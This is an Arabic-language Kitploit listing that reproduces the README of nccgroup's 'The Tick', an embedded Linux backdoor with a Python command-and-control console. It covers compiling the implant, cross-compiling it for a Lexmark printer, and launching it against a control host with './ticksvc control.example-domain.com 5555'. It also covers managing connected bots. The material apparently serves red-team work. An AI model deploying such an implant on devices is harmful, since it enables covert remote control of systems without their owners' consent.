Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
thetick — A simple embedded Linux backdoor. | Kitploit
أدوات/GitHubGitHub/nccgroup/thetick
Embedded Systems SecurityPersistence MechanismsPost-ExploitationCommand and ControlRed TeamingRemote Access Tool
GitHubnccgroup/thetick

thetick

A simple embedded Linux backdoor.

عرض المستودع
19834منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

The Tick

باب خلفي بسيط للينكس المضمّن.

  • The Tick
    • تجميع
    • تثبيت
    • الاستخدام
    • وسائط

لقطة شاشة 1

تجميع

يعتمد The Tick على libcurl فقط، لذا تأكد من توفر حزمة التطوير المناسبة. على سبيل المثال، في التوزيعات المبنية على دبيان ستقوم بما يلي:

root@kitploit:~
sudo apt-get install libcurl-dev

بمجرد تثبيت التبعيات، قم بتشغيل ملف makefile:

root@kitploit:~
cd src
make clean
make

بمجرد اكتمال تشغيل الأمر "make"، ستجد الملف الثنائي المُجمَّع في مجلد "bin". هذا هو الملف الثنائي الذي تريد تشغيله على جهازك الهدف للتحكم فيه عن بُعد.

عند إجراء الترجمة المتقاطعة (cross-compiling) للأنظمة الأساسية المدعومة، يتم حل التبعيات وتجميعها تلقائيًا نيابةً عنك. حاليًا، النظام الأساسي الوحيد المدعوم للترجمة المتقاطعة هو طابعة Lexmark CX310DN، ولكن ستُضاف أجهزة أخرى لاحقًا. راجع ملف makefile لمزيد من التفاصيل.

واجهة القيادة والتحكم مكتوبة بلغة Python، وبالتالي لا تحتاج إلى تجميع.

تثبيت

الحصول على الثبات (persistence) على الباب الخلفي يعتمد بشكل كبير على النظام الأساسي الهدف، ولذلك لا يُوثَّق هنا.

على الجهاز الهدف، قم بتشغيل الملف الثنائي للباب الخلفي بالوسائط التالية:

root@kitploit:~
./ticksvc ADDR PORT

حيث يجب استبدال "ADDR" و"PORT" بعنوان IP والمنفذ حيث ستستمع واجهة القيادة والتحكم. المنفذ الافتراضي هو 5555.

لا تتطلب واجهة القيادة والتحكم أي تثبيت، ولكن قد يكون لديها تبعيات غير محلولة. نفّذ الأمر التالي للتأكد من تثبيت جميع التبعيات بشكل صحيح (لاحظ أن هذا لا يتطلب صلاحيات sudo):

root@kitploit:~
pip install --upgrade -r requirements.txt

في معظم بيئات سطح مكتب لينكس، سيقوم ملف "Tick.desktop" التالي بإنشاء أيقونة يمكنك النقر عليها مرتين لتشغيل الواجهة:

root@kitploit:~
[Desktop Entry]
Encoding=UTF-8
Value=1.0
Type=Application
Name=The Tick
GenericName=The Tick
Comment=An embedded Linux backdoor
Icon=/opt/thetick/doc/logo.png
Exec=/opt/thetick/tick.py
Terminal=true
Path=/opt/thetick/

قد يختلف الموقع الدقيق لملف Tick.desktop بين توزيعات لينكس، ولكن بشكل عام وضعه على سطح المكتب يجب أن يعمل. تأكد من تعديل المسار إلى المكان الذي حمّلت فيه The Tick (/opt/thetick في المثال أعلاه).

الاستخدام

لتشغيل الملف الثنائي للباب الخلفي على النظام الأساسي الهدف، اضبط اسم مضيف خادم التحكم والمنفذ كخيارات لسطر الأوامر. على سبيل المثال:

root@kitploit:~
./ticksvc control.example-domain.com 5555

على خادم التحكم، قد ترغب في تشغيل الواجهة داخل جلسة GNU screen أو ما شابه ذلك:

root@kitploit:~
sudo apt-get install screen
screen -S thetick ./thetick.py

بهذه الطريقة يمكنك الانفصال عن الواجهة بالضغط على Control+A ثم D. ويمكنك العودة إلى الواجهة لاحقًا هكذا:

root@kitploit:~
screen -r thetick

ستُعلمك الواجهة عند اتصال بوت جديد بها. استخدم الأمر "bots" لعرض البوتات المتصلة حاليًا، وسيحدد الأمر "use" بوتًا للعمل معه. ويعرض الأمر "help" دليل المستخدم.

فيما يلي بعض لقطات الشاشة التي توضح ما يمكن أن تفعله الواجهة:

لقطة شاشة 2

لقطة شاشة 3

وسائط

تمت الإشارة إلى The Tick في العرض التالي من مؤتمر 44Con من تقديم Daniel Romero وMario Rivas:

تنزيل الأداة